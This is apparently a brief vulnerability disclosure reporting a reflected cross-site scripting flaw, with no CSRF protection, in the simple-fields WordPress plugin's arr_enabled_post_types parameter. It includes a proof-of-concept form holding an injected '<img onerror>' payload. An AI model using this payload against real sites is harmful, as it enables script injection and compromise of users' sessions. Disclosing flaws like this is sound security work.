Hello,
1. Reflected Cross-Site Scripting (XSS)
Authenticated users (like subscribers) can inject html/js code (there is no CSRF protection!).
Method: POST
Vulnerable parameters: arr_enabled_post_types
Example PHP callstack:
simple_fields::field_type_post_dialog_load [/simple-fields/simple_fields.php:2645]
Verification:
--
<input type="text" name="arr_enabled_post_types[0]" value='"><img src=x onerror=alert(1) />' />
<input type="submit" name="submit" />
</form>
--
--
Regards,
Marcin Probola,